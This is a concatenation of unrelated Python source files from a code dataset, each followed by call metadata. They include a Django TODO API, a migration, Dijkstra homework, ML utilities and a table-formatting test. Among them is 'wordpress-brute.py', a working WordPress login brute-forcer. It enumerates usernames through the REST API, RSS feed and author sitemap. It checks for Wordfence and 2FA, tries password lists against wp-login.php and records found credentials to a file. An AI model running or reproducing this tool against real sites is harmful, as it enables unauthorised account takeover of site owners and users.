spaces = ' ' * indent
pretty = spaces + 'try:\n'
pretty += self.body.pretty_str(indent=indent + 2)
for block in self.catches:
pretty += '\n' + block.pretty_str(indent)
if len(self.finally_body) > 0:
pretty += '\n{}finally:\n'.format(spaces)
pretty += self.finally_body.pretty_str(indent=indent + 2)
return pretty
class CodeCatchBlock(CodeStatement, CodeStatementGroup):
"""Helper class for catch statements within a try-catch block."""
def __init__(self, scope, parent):
"""Constructor for catch block structures."""
CodeStatement.__init__(self, scope, parent)
self.declarations = None
self.body = CodeBlock(scope, self, explicit=True)
def _set_declarations(self, declarations):
"""Set declarations local to this catch block."""
assert isinstance(declarations, CodeStatement)
self.declarations = declarations
declarations.scope = self.body
def _set_body(self, body):
"""Set the main body of the catch block."""
assert isinstance(body, CodeBlock)
self.body = body
def _children(self):
"""Yield all direct children of this object."""
if isinstance(self.declarations, CodeStatement):
yield self.declarations
for codeobj in self.body._children():
yield codeobj
def __repr__(self):
"""Return a string representation of this object."""
return 'catch ({}) {}'.format(self.declarations, self.body)
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
spaces = ' ' * indent
decls = ('...' if self.declarations is None
else self.declarations.pretty_str())
body = self.body.pretty_str(indent=indent + 2)
pretty = '{}catch ({}):\n{}'.format(spaces, decls, body)
return pretty
###############################################################################
# Helpers
###############################################################################
def pretty_str(something, indent=0):
"""Return a human-readable string representation of an object.
Uses `pretty_str` if the given value is an instance of
`CodeEntity` and `repr` otherwise.
Args:
something: Some value to convert.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
if isinstance(something, CodeEntity):
return something.pretty_str(indent=indent)
else:
return (' ' * indent) + repr(something)
| [] |
felipe-menelau/todo-list-web | api/views/todo_views.py | 9b60a549dc6d5bdd88e1a584b8bb2c4f56131cb5 | from django.contrib.auth.models import User
from rest_framework import viewsets, status
from rest_framework.response import Response
from rest_framework.permissions import IsAuthenticated, IsAdminUser
from api.serializers import TODOListSerializer
from api.models import TODOList
class TODOListViewSet(viewsets.ModelViewSet):
permission_classes = [IsAuthenticated]
serializer_class = TODOListSerializer
def get_queryset(self):
user = self.request.user
return TODOList.objects.filter(owner=self.request.user).order_by('created_at')
def create(self, request, *args, **kwargs):
request.data['owner'] = request.user.id
return super(self.__class__, self).create(request, *args, **kwargs)
| [((16, 15, 16, 63), 'api.models.TODOList.objects.filter', 'TODOList.objects.filter', (), '', False, 'from api.models import TODOList\n')] |
techkey/PTVS | Python/Tests/TestData/ProjectHomeProjects/Subfolder/ProgramB.py | 8355e67eedd8e915ca49bd38a2f36172696fd903 | # ProgramB.py
print('Hello World')
| [] |
effective-altruism-australia/donation-portal | donation/migrations/0043_auto_20180109_0012.py | 45fe58edc44d0c4444b493e4ac025fc53897c799 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
def copy_existing_referrals_into_new_field(apps, schema_editor):
Pledge = apps.get_model('donation', 'Pledge')
Referral = apps.get_model('donation', 'Referral')
reasons = Pledge.objects.values_list('how_did_you_hear_about_us', flat=True).distinct()
for reason in reasons:
if reason: # Filter out None and u''
Referral.objects.create(reason=reason)
for pledge in Pledge.objects.all():
reason = pledge.how_did_you_hear_about_us
if reason:
pledge.how_did_you_hear_about_us_db = Referral.objects.get(reason=reason)
pledge.save()
class Migration(migrations.Migration):
dependencies = [
('donation', '0042_amend_donation_view'),
]
operations = [
migrations.CreateModel(
name='Referral',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('reason', models.CharField(max_length=256)),
],
),
migrations.AddField(
model_name='pledge',
name='how_did_you_hear_about_us_db',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, verbose_name='How did you hear about us?', blank=True, to='donation.Referral', null=True),
),
migrations.RunPython(copy_existing_referrals_into_new_field)
]
| [((42, 8, 42, 68), 'django.db.migrations.RunPython', 'migrations.RunPython', ({(42, 29, 42, 67): 'copy_existing_referrals_into_new_field'}, {}), '(copy_existing_referrals_into_new_field)', False, 'from django.db import migrations, models\n'), ((40, 18, 40, 170), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((33, 23, 33, 112), 'django.db.models.AutoField', 'models.AutoField', (), '', False, 'from django.db import migrations, models\n'), ((34, 27, 34, 59), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n')] |
c1m50c/twitter-examples | python/is_even.py | c3ed7cf88dacbb761fed1b0b0dc593d7d3648378 | def is_even(i: int) -> bool:
if i == 1:
return False
elif i == 2:
return True
elif i == 3:
return False
elif i == 4:
return True
elif i == 5:
...
# Never do that! Use one of these instead...
is_even = lambda i : i % 2 == 0
is_even = lambda i : not i & 1
is_odd = lambda i : not is_even(i) | [] |
RandomRobbieBF/wordpress-bf | wordpress-brute.py | fe78d4367b7baaf18a4200c5c040595d37b4100f | #!/usr/bin/env python
#
# Wordpress Bruteforce Tool
#
# By @random_robbie
#
#
import requests
import json
import sys
import argparse
import re
import os.path
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
session = requests.Session()
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", required=True, default="http://wordpress.lan", help="Wordpress URL")
parser.add_argument("-f", "--file", required=True, default="pass.txt" ,help="Password File")
args = parser.parse_args()
url = args.url
passfile = args.file
http_proxy = ""
proxyDict = {
"http" : http_proxy,
"https" : http_proxy,
"ftp" : http_proxy
}
# Grab Wordpress Users via Wordpress JSON api
def grab_users_api(url):
headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"}
response = session.get(""+url+"/wp-json/wp/v2/users", headers=headers,verify=False, proxies=proxyDict)
if 'rest_user_cannot_view' in response.text:
print ("[-] REST API Endpoint Requires Permissions [-]")
return False
if response.status_code == 404:
print ("[-] Rest API Endpoint returns 404 Not Found [-]")
return False
elif response.status_code == 200:
jsonstr = json.loads(response.content)
return jsonstr
# Grab Wordpress Users via Sitemap
def grab_users_sitemap(url):
headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"}
response = session.get(""+url+"/author-sitemap.xml", headers=headers,verify=False, proxies=proxyDict)
if response.status_code == 404:
return False
elif response.status_code == 200:
return response.text
# Grab Wordpress Users via RSS Feed
def grab_users_rssfeed(url):
headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"}
response = session.get(""+url+"/feed/", headers=headers,verify=False, proxies=proxyDict)
if response.status_code == 404:
return False
elif response.status_code == 200:
if "dc:creator" in response.text:
return response.text
# Check we can get to wp-admin login.
def check_wpadmin(url):
headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"}
response = session.get(""+url+"/wp-login.php?reauth=1&jetpack-sso-show-default-form=1", headers=headers,verify=False, proxies=proxyDict)
if "Powered by WordPress" in response.text:
if "wp-submit" in response.text:
if "reCAPTCHA" not in response.text:
return True
else:
return False
else:
return False
else:
return False
# Check URL is wordpress
def check_is_wp(url):
headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"}
response = session.get(""+url+"", headers=headers,verify=False, proxies=proxyDict)
if "wp-content" in response.text:
return True
else:
return False
# Check if wordfence is installed as this limits the logins to 20 per ip
def check_wordfence(url):
headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"}
response = session.get(""+url+"/wp-content/plugins/wordfence/readme.txt", headers=headers,verify=False, proxies=proxyDict)
if "Wordfence Security - Firewall & Malware Scan" in response.text:
return True
else:
return False
# Test the logins
def test_login (url,user,password,cnt,attempts):
if str(cnt) == attempts:
print("[-] Stopping as Wordfence will block your IP [-]")
sys.exit(0)
paramsPost = {"wp-submit":"Log In","pwd":""+password+"","log":""+user+"","testcookie":"1","redirect_to":""+url+"/wp-admin/"}
headers = {"Origin":""+url+"","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Content-Type":"application/x-www-form-urlencoded"}
cookies = {"wordpress_test_cookie":"WP+Cookie+check"}
response = session.post(""+url+"/wp-login.php?redirect_to="+url+"/wp-admin/", data=paramsPost, headers=headers, cookies=cookies,verify=False, proxies=proxyDict,allow_redirects = False)
if response.status_code == 503:
print("[-] Website is giving 503 HTTP Status [-]")
sys.exit(0)
if response.status_code == 502:
print("[-] Website is giving 502 HTTP Status [-]")
sys.exit(0)
if response.status_code == 403:
print("[-] Website is giving 403 HTTP Status - WAF Blocking[-]")
sys.exit(0)
if "Google Authenticator code" in response.text:
print("[-] 2FA is enabled Sorry [-]")
sys.exit(0)
if "wordpress_logged_in" in response.headers['Set-Cookie']:
print("[+] Found Login Username: "+user+" Password: "+password+" on attempt "+str(cnt)+" [+]")
text_file = open("found.txt", "a")
text_file.write(""+url+" Found Login Username: "+user+" Password: "+password+"\n")
text_file.close()
sys.exit(0)
else:
print("[-] Login Failed for Username: "+user+" Password: "+password+" on attempt "+str(cnt)+" [-]")
cnt += 1
return cnt
def count_pass(passfile):
count = 0
with open(passfile, 'r') as f:
for line in f:
count += 1
f.close()
return str(count)
# Dont no body like dupes.
def remove_dupes():
lines_seen = set()
outfile = open("users.txt", "w")
for line in open("rssusers.txt", "r"):
if line not in lines_seen:
outfile.write(line)
lines_seen.add(line)
outfile.close()
def attack_restapi(url,attempts,userdata,passfile):
for id in userdata:
user = id['slug']
cnt = 1
print(("[+] Found User: "+user+" [+]"))
with open(passfile, 'r') as f:
for line in f:
password = line.strip()
cnt = test_login (url,user,password,cnt,attempts)
f.close()
def attack_rssfeed(url,attempts,userdata,passfile):
users = re.compile("<dc:creator><!(.+?)]]></dc:creator").findall(userdata)
if os.path.exists("rssusers.txt"):
os.remove("rssusers.txt")
if os.path.exists("users.txt"):
os.remove("users.txt")
for user in users:
u = user.replace("[CDATA[","")
text_file = open("rssusers.txt", "a")
text_file.write(""+str(u)+"\n")
text_file.close()
remove_dupes()
with open("users.txt", 'r') as f:
for line in f:
user = line.strip()
cnt = 1
print(("[+] Found User: "+user+" [+]"))
with open(passfile, 'r') as b:
for line in b:
password = line.strip()
cnt = test_login (url,user,password,cnt,attempts)
f.close()
b.close()
def attack_sitemap(url,attempts,userdata,passfile):
auth = re.findall(r'(<loc>(.*?)</loc>)\s',userdata)
for user in auth:
thisuser = user[1]
h = thisuser.split('/')
user = h[4]
cnt = 1
with open(passfile, 'r') as f:
for line in f:
password = line.strip()
cnt = test_login (url,user,password,cnt,attempts)
f.close()
# Time For Some Machine Learning Quality IF statements.
def basic_checks(url):
if check_is_wp(url):
if check_wpadmin(url):
return True
else:
return False
else:
return False
if basic_checks(url):
print("[+] Confirmed Wordpress Website [+]")
else:
print ("[-] Sorry this is either not a wordpress website or there is a issue blocking wp-admin [-]")
sys.exit(0)
if os.path.isfile(passfile) and os.access(passfile, os.R_OK):
print("[+] Password List Used: "+passfile+" [+]")
else:
print("[-] Either the file is missing or not readable [-]")
sys.exit(0)
# Method Value for which method to enumerate users from
method = "None"
attempts = "None"
# Which method to use for enumeration
if grab_users_api(url):
print("[+] Users found via Rest API [-]")
method = "restapi"
if grab_users_rssfeed(url) and method == "None":
print("[+] Users found via RSS Feed [+]")
method = "rss"
if grab_users_sitemap(url) and method == "None":
print("[+] Users found via Authors Sitemap [-]")
method = "sitemap"
if method == "None":
print ("[-] Oh Shit it seems I was unable to find a method to grab usernames from [-]")
sys.exit(0)
if check_wordfence(url):
print ("[+] Wordfence is installed this will limit the testing to 20 attempts [+]")
attempts = "20"
# Kick off Parsing and attacking
if method == "restapi":
userdata = grab_users_api(url)
attack_restapi(url,attempts,userdata,passfile)
if method == "rss":
userdata = grab_users_rssfeed(url)
attack_rssfeed(url,attempts,userdata,passfile)
if method == "sitemap":
userdata = grab_users_sitemap(url)
attack_sitemap(url,attempts,userdata,passfile)
| [((16, 0, 16, 66), 'requests.packages.urllib3.disable_warnings', 'requests.packages.urllib3.disable_warnings', ({(16, 43, 16, 65): 'InsecureRequestWarning'}, {}), '(InsecureRequestWarning)', False, 'import requests\n'), ((17, 10, 17, 28), 'requests.Session', 'requests.Session', ({}, {}), '()', False, 'import requests\n'), ((20, 9, 20, 34), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ({}, {}), '()', False, 'import argparse\n'), ((208, 8, 208, 52), 're.findall', 're.findall', ({(208, 19, 208, 42): '"""(<loc>(.*?)</loc>)\\\\s"""', (208, 43, 208, 51): 'userdata'}, {}), "('(<loc>(.*?)</loc>)\\\\s', userdata)", False, 'import re\n'), ((238, 1, 238, 12), 'sys.exit', 'sys.exit', ({(238, 10, 238, 11): '(0)'}, {}), '(0)', False, 'import sys\n'), ((244, 4, 244, 15), 'sys.exit', 'sys.exit', ({(244, 13, 244, 14): '(0)'}, {}), '(0)', False, 'import sys\n'), ((265, 1, 265, 12), 'sys.exit', 'sys.exit', ({(265, 10, 265, 11): '(0)'}, {}), '(0)', False, 'import sys\n'), ((114, 2, 114, 13), 'sys.exit', 'sys.exit', ({(114, 11, 114, 12): '(0)'}, {}), '(0)', False, 'import sys\n'), ((121, 2, 121, 13), 'sys.exit', 'sys.exit', ({(121, 11, 121, 12): '(0)'}, {}), '(0)', False, 'import sys\n'), ((124, 2, 124, 13), 'sys.exit', 'sys.exit', ({(124, 11, 124, 12): '(0)'}, {}), '(0)', False, 'import sys\n'), ((127, 2, 127, 13), 'sys.exit', 'sys.exit', ({(127, 11, 127, 12): '(0)'}, {}), '(0)', False, 'import sys\n'), ((130, 2, 130, 13), 'sys.exit', 'sys.exit', ({(130, 11, 130, 12): '(0)'}, {}), '(0)', False, 'import sys\n'), ((137, 2, 137, 13), 'sys.exit', 'sys.exit', ({(137, 11, 137, 12): '(0)'}, {}), '(0)', False, 'import sys\n'), ((49, 12, 49, 40), 'json.loads', 'json.loads', ({(49, 23, 49, 39): 'response.content'}, {}), '(response.content)', False, 'import json\n'), ((180, 9, 180, 57), 're.compile', 're.compile', ({(180, 20, 180, 56): '"""<dc:creator><!(.+?)]]></dc:creator"""'}, {}), "('<dc:creator><!(.+?)]]></dc:creator')", False, 'import re\n')] |
liaoaoyuan97/standford_algorithms_specialization | graph_search/week2/assignment_dijkstra_shortest_paths.py | 2914fdd397ce895d986ac855e78afd7a51ceff68 | import heapq
import time
from os import path
from math import floor
class Heap:
def __init__(self):
self.size = 0
self.array = []
self.v2index_map = {}
def __get_parent_index(self, idx):
return int(floor((idx - 1) / 2))
def __get_left_child_index(self, idx):
return 2 * idx + 1
def __get_right_child_index(self, idx):
return 2 * idx + 2
def __swap_value(self, i, j):
t = self.array[i]
self.v2index_map[t[0]] = j
self.v2index_map[self.array[j][0]] = i
self.array[i] = self.array[j]
self.array[j] = t
def __bubble_up(self, idx):
parent_idx = self.__get_parent_index(idx)
while parent_idx >= 0:
if self.array[parent_idx][1] <= self.array[idx][1]:
break
self.__swap_value(parent_idx, idx)
idx = parent_idx
parent_idx = self.__get_parent_index(idx)
def __bubble_down(self, idx):
left_idx = self.__get_left_child_index(idx)
right_idx = self.__get_right_child_index(idx)
while left_idx < self.size or right_idx < self.size:
min_idx = left_idx
if left_idx >= self.size or (right_idx < self.size and self.array[right_idx][1] < self.array[left_idx][1]):
min_idx = right_idx
if self.array[idx][1] < self.array[min_idx][1]:
break
self.__swap_value(idx, min_idx)
idx = min_idx
left_idx = self.__get_left_child_index(idx)
right_idx = self.__get_right_child_index(idx)
def get_vertex_key(self, v_id):
return self.array[self.v2index_map[v_id]][1]
def pop(self):
if self.size < 1:
raise IndexError
min_node = self.array[0]
self.size = self.size - 1
self.__swap_value(0, self.size)
self.array.pop()
if self.size > 1:
self.__bubble_down(0)
del self.v2index_map[min_node[0]]
return min_node
def insert(self, node):
self.array.append(node)
self.v2index_map[node[0]] = self.size
self.size = self.size + 1
if self.size > 1:
self.__bubble_up(self.size - 1)
def modify_key(self, v_id, update_val):
idx = self.v2index_map[v_id]
self.array[idx] = (v_id, update_val)
parent_idx = self.__get_parent_index(idx)
if parent_idx >= 0 and self.array[idx][1] < self.array[parent_idx][1]:
self.__bubble_up(idx)
else:
self.__bubble_down(idx)
def read_graph(filename):
graph = dict()
with open(path.join('.', filename), 'r') as f:
for row in f.readlines():
edges = row.strip('\t\n').split('\t')
s = int(edges[0])
graph[s] = []
for i in range(1, len(edges)):
edge = edges[i].split(',')
graph[s].append((int(edge[0]), int(edge[1])))
return graph
def get_shortest_paths_heapq(graph):
heap = []
heapq.heappush(heap, (0, 1)) # (dj_score, vertex_id)
distances = {i: 1000000 for i in graph}
distances[1] = 0
X = []
while heap:
cur_distance, cur_v = heapq.heappop(heap)
if cur_distance > distances[cur_v]:
continue
# added to X
X.append(cur_v)
for neighbor, weight in graph[cur_v]:
dj_score = cur_distance + weight
if dj_score < distances[neighbor]:
distances[neighbor] = dj_score
heapq.heappush(heap, (dj_score, neighbor))
return distances, X
def get_shortest_paths_self_defined_heap(graph):
heap = Heap()
heap.insert((1, 0)) # (vertex_id, dj_score)
for v in graph:
if v != 1:
heap.insert((v, 1000000))
shortest_paths = dict()
n_v = len(graph)
while len(shortest_paths) < n_v:
assert len(shortest_paths) + heap.size == n_v
cur_v, v_score = heap.pop()
shortest_paths[cur_v] = v_score
for neighbor, weight in graph[cur_v]:
dj_score = v_score + weight
# import pdb;pdb.set_trace()
if neighbor not in shortest_paths and dj_score < heap.get_vertex_key(neighbor):
heap.modify_key(neighbor, dj_score)
return shortest_paths
if __name__ == "__main__":
# test case 1, output: {1: 0, 2: 1, 3: 2, 4: 2, 5: 3, 6: 4}
# graph = {
# 1: [(6, 7), (5, 3), (2, 1), (4, 2), (3, 3)],
# 2: [(1, 1), (3, 1), (4, 1), (6, 6)],
# 3: [(1, 3), (2, 1), (6, 2)],
# 4: [(2, 1), (1, 2), (6, 5)],
# 5: [(1, 3), (6, 3)],
# 6: [(1, 7), (3, 2), (2, 6), (4, 5), (5, 3)]
# }
graph = read_graph("Dijkstra.txt")
dedup_edges = set()
for k, _ in graph.items():
for v in _:
dedup_edges.add((k, v[0], v[1]))
dedup_edges.add((v[0], k, v[1]))
assert len(dedup_edges) == sum([len(e) for e in graph.values()])
# graph = {}
# heap = Heap()
# heap.insert((1,0))
# heap.insert((2,0))
# heap.pop()
start_t = time.time()
min_distances,X = get_shortest_paths_heapq(graph)
print(time.time() - start_t)
# print(min_distances)
e = [7, 37, 59, 82, 99, 115, 133, 165, 188, 197]
print(",".join([str(int(min_distances[i])) for i in e]))
start_t = time.time()
min_distances = get_shortest_paths_self_defined_heap(graph, X)
print(time.time() - start_t)
# print(min_distances)
e = [7, 37, 59, 82, 99, 115, 133, 165, 188, 197]
print(",".join([str(int(min_distances[i])) for i in e]))
| [((114, 4, 114, 32), 'heapq.heappush', 'heapq.heappush', ({(114, 19, 114, 23): 'heap', (114, 25, 114, 31): '(0, 1)'}, {}), '(heap, (0, 1))', False, 'import heapq\n'), ((188, 14, 188, 25), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((196, 14, 196, 25), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((120, 30, 120, 49), 'heapq.heappop', 'heapq.heappop', ({(120, 44, 120, 48): 'heap'}, {}), '(heap)', False, 'import heapq\n'), ((14, 19, 14, 39), 'math.floor', 'floor', ({(14, 25, 14, 38): '((idx - 1) / 2)'}, {}), '((idx - 1) / 2)', False, 'from math import floor\n'), ((99, 14, 99, 38), 'os.path.join', 'path.join', ({(99, 24, 99, 27): '"""."""', (99, 29, 99, 37): 'filename'}, {}), "('.', filename)", False, 'from os import path\n'), ((190, 10, 190, 21), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((198, 10, 198, 21), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((131, 16, 131, 58), 'heapq.heappush', 'heapq.heappush', ({(131, 31, 131, 35): 'heap', (131, 37, 131, 57): '(dj_score, neighbor)'}, {}), '(heap, (dj_score, neighbor))', False, 'import heapq\n')] |
huimlight/SoftTeacher | ssod/utils/structure_utils.py | 97064fbcce1ab87b40977544ba7a9c488274d66f | import warnings
from collections import Counter, Mapping, Sequence
from numbers import Number
from typing import Dict, List
import numpy as np
import torch
from mmdet.core.mask.structures import BitmapMasks
from torch.nn import functional as F
_step_counter = Counter()
def list_concat(data_list: List[list]):
if isinstance(data_list[0], torch.Tensor):
return torch.cat(data_list)
else:
endpoint = [d for d in data_list[0]]
for i in range(1, len(data_list)):
endpoint.extend(data_list[i])
return endpoint
def sequence_concat(a, b):
if isinstance(a, Sequence) and isinstance(b, Sequence):
return a + b
else:
return None
def dict_concat(dicts: List[Dict[str, list]]):
return {k: list_concat([d[k] for d in dicts]) for k in dicts[0].keys()}
def dict_fuse(obj_list, reference_obj):
if isinstance(reference_obj, torch.Tensor):
return torch.stack(obj_list)
return obj_list
def dict_select(dict1: Dict[str, list], key: str, value: str):
flag = [v == value for v in dict1[key]]
return {
k: dict_fuse([vv for vv, ff in zip(v, flag) if ff], v) for k, v in dict1.items()
}
def dict_split(dict1, key):
group_names = list(set(dict1[key]))
dict_groups = {k: dict_select(dict1, key, k) for k in group_names}
return dict_groups
def dict_sum(a, b):
if isinstance(a, dict):
assert isinstance(b, dict)
return {k: dict_sum(v, b[k]) for k, v in a.items()}
elif isinstance(a, list):
assert len(a) == len(b)
return [dict_sum(aa, bb) for aa, bb in zip(a, b)]
else:
return a + b
def zero_like(tensor_pack, prefix=""):
if isinstance(tensor_pack, Sequence):
return [zero_like(t) for t in tensor_pack]
elif isinstance(tensor_pack, Mapping):
return {prefix + k: zero_like(v) for k, v in tensor_pack.items()}
elif isinstance(tensor_pack, torch.Tensor):
return tensor_pack.new_zeros(tensor_pack.shape)
elif isinstance(tensor_pack, np.ndarray):
return np.zeros_like(tensor_pack)
else:
warnings.warn("Unexpected data type {}".format(type(tensor_pack)))
return 0
def pad_stack(tensors, shape, pad_value=255):
tensors = torch.stack(
[
F.pad(
tensor,
pad=[0, shape[1] - tensor.shape[1], 0, shape[0] - tensor.shape[0]],
value=pad_value,
)
for tensor in tensors
]
)
return tensors
def result2bbox(result):
num_class = len(result)
bbox = np.concatenate(result)
if bbox.shape[0] == 0:
label = np.zeros(0, dtype=np.uint8)
else:
label = np.concatenate(
[[i] * len(result[i]) for i in range(num_class) if len(result[i]) > 0]
).reshape((-1,))
return bbox, label
def result2mask(result):
num_class = len(result)
mask = [np.stack(result[i]) for i in range(num_class) if len(result[i]) > 0]
if len(mask) > 0:
mask = np.concatenate(mask)
else:
mask = np.zeros((0, 1, 1))
return BitmapMasks(mask, mask.shape[1], mask.shape[2]), None
def sequence_mul(obj, multiplier):
if isinstance(obj, Sequence):
return [o * multiplier for o in obj]
else:
return obj * multiplier
def is_match(word, word_list):
for keyword in word_list:
if keyword in word:
return True
return False
def weighted_loss(loss: dict, weight, ignore_keys=[], warmup=0):
_step_counter["weight"] += 1
lambda_weight = (
lambda x: x * (_step_counter["weight"] - 1) / warmup
if _step_counter["weight"] <= warmup
else x
)
if isinstance(weight, Mapping):
for k, v in weight.items():
for name, loss_item in loss.items():
if (k in name) and ("loss" in name):
loss[name] = sequence_mul(loss[name], lambda_weight(v))
elif isinstance(weight, Number):
for name, loss_item in loss.items():
if "loss" in name:
if not is_match(name, ignore_keys):
loss[name] = sequence_mul(loss[name], lambda_weight(weight))
else:
loss[name] = sequence_mul(loss[name], 0.0)
else:
raise NotImplementedError()
return loss
| [((11, 16, 11, 25), 'collections.Counter', 'Counter', ({}, {}), '()', False, 'from collections import Counter, Mapping, Sequence\n'), ((98, 11, 98, 33), 'numpy.concatenate', 'np.concatenate', ({(98, 26, 98, 32): 'result'}, {}), '(result)', True, 'import numpy as np\n'), ((16, 15, 16, 35), 'torch.cat', 'torch.cat', ({(16, 25, 16, 34): 'data_list'}, {}), '(data_list)', False, 'import torch\n'), ((38, 15, 38, 36), 'torch.stack', 'torch.stack', ({(38, 27, 38, 35): 'obj_list'}, {}), '(obj_list)', False, 'import torch\n'), ((100, 16, 100, 43), 'numpy.zeros', 'np.zeros', (), '', True, 'import numpy as np\n'), ((110, 12, 110, 31), 'numpy.stack', 'np.stack', ({(110, 21, 110, 30): 'result[i]'}, {}), '(result[i])', True, 'import numpy as np\n'), ((112, 15, 112, 35), 'numpy.concatenate', 'np.concatenate', ({(112, 30, 112, 34): 'mask'}, {}), '(mask)', True, 'import numpy as np\n'), ((114, 15, 114, 34), 'numpy.zeros', 'np.zeros', ({(114, 24, 114, 33): '(0, 1, 1)'}, {}), '((0, 1, 1))', True, 'import numpy as np\n'), ((115, 11, 115, 58), 'mmdet.core.mask.structures.BitmapMasks', 'BitmapMasks', ({(115, 23, 115, 27): 'mask', (115, 29, 115, 42): 'mask.shape[1]', (115, 44, 115, 57): 'mask.shape[2]'}, {}), '(mask, mask.shape[1], mask.shape[2])', False, 'from mmdet.core.mask.structures import BitmapMasks\n'), ((84, 12, 88, 13), 'torch.nn.functional.pad', 'F.pad', (), '', True, 'from torch.nn import functional as F\n'), ((75, 15, 75, 41), 'numpy.zeros_like', 'np.zeros_like', ({(75, 29, 75, 40): 'tensor_pack'}, {}), '(tensor_pack)', True, 'import numpy as np\n')] |
zzl0/cli_helpers | tests/tabular_output/test_terminaltables_adapter.py | 266645937423225bdb636ef6aa659f1a40ceec5f | # -*- coding: utf-8 -*-
"""Test the terminaltables output adapter."""
from __future__ import unicode_literals
from textwrap import dedent
import pytest
from cli_helpers.compat import HAS_PYGMENTS
from cli_helpers.tabular_output import terminaltables_adapter
if HAS_PYGMENTS:
from pygments.style import Style
from pygments.token import Token
def test_terminal_tables_adapter():
"""Test the terminaltables output adapter."""
data = [['abc', 1], ['d', 456]]
headers = ['letters', 'number']
output = terminaltables_adapter.adapter(
iter(data), headers, table_format='ascii')
assert "\n".join(output) == dedent('''\
+---------+--------+
| letters | number |
+---------+--------+
| abc | 1 |
| d | 456 |
+---------+--------+''')
@pytest.mark.skipif(not HAS_PYGMENTS, reason='requires the Pygments library')
def test_style_output_table():
"""Test that *style_output_table()* styles the output table."""
class CliStyle(Style):
default_style = ""
styles = {
Token.Output.TableSeparator: '#ansired',
}
headers = ['h1', 'h2']
data = [['观音', '2'], ['Ποσειδῶν', 'b']]
style_output_table = terminaltables_adapter.style_output_table('ascii')
style_output_table(data, headers, style=CliStyle)
output = terminaltables_adapter.adapter(iter(data), headers, table_format='ascii')
assert "\n".join(output) == dedent('''\
\x1b[31;01m+\x1b[39;00m''' + (
('\x1b[31;01m-\x1b[39;00m' * 10) +
'\x1b[31;01m+\x1b[39;00m' +
('\x1b[31;01m-\x1b[39;00m' * 4)) +
'''\x1b[31;01m+\x1b[39;00m
\x1b[31;01m|\x1b[39;00m h1 \x1b[31;01m|\x1b[39;00m''' +
''' h2 \x1b[31;01m|\x1b[39;00m
''' + '\x1b[31;01m+\x1b[39;00m' + (
('\x1b[31;01m-\x1b[39;00m' * 10) +
'\x1b[31;01m+\x1b[39;00m' +
('\x1b[31;01m-\x1b[39;00m' * 4)) +
'''\x1b[31;01m+\x1b[39;00m
\x1b[31;01m|\x1b[39;00m 观音 \x1b[31;01m|\x1b[39;00m''' +
''' 2 \x1b[31;01m|\x1b[39;00m
\x1b[31;01m|\x1b[39;00m Ποσειδῶν \x1b[31;01m|\x1b[39;00m''' +
''' b \x1b[31;01m|\x1b[39;00m
''' + '\x1b[31;01m+\x1b[39;00m' + (
('\x1b[31;01m-\x1b[39;00m' * 10) +
'\x1b[31;01m+\x1b[39;00m' +
('\x1b[31;01m-\x1b[39;00m' * 4)) +
'\x1b[31;01m+\x1b[39;00m')
| [((32, 1, 32, 77), 'pytest.mark.skipif', 'pytest.mark.skipif', (), '', False, 'import pytest\n'), ((43, 25, 43, 75), 'cli_helpers.tabular_output.terminaltables_adapter.style_output_table', 'terminaltables_adapter.style_output_table', ({(43, 67, 43, 74): '"""ascii"""'}, {}), "('ascii')", False, 'from cli_helpers.tabular_output import terminaltables_adapter\n'), ((23, 32, 29, 32), 'textwrap.dedent', 'dedent', ({(23, 39, 29, 31): '""" +---------+--------+\n | letters | number |\n +---------+--------+\n | abc | 1 |\n | d | 456 |\n +---------+--------+"""'}, {}), '(\n """ +---------+--------+\n | letters | number |\n +---------+--------+\n | abc | 1 |\n | d | 456 |\n +---------+--------+"""\n )', False, 'from textwrap import dedent\n'), ((48, 32, 69, 34), 'textwrap.dedent', 'dedent', ({(48, 39, 69, 33): '(\' \\x1b[31;01m+\\x1b[39;00m\' + (\'\\x1b[31;01m-\\x1b[39;00m\' * 10 +\n \'\\x1b[31;01m+\\x1b[39;00m\' + \'\\x1b[31;01m-\\x1b[39;00m\' * 4) +\n """\x1b[31;01m+\x1b[39;00m\n \x1b[31;01m|\x1b[39;00m h1 \x1b[31;01m|\x1b[39;00m"""\n + \' h2 \\x1b[31;01m|\\x1b[39;00m\\n \' + \'\\x1b[31;01m+\\x1b[39;00m\' 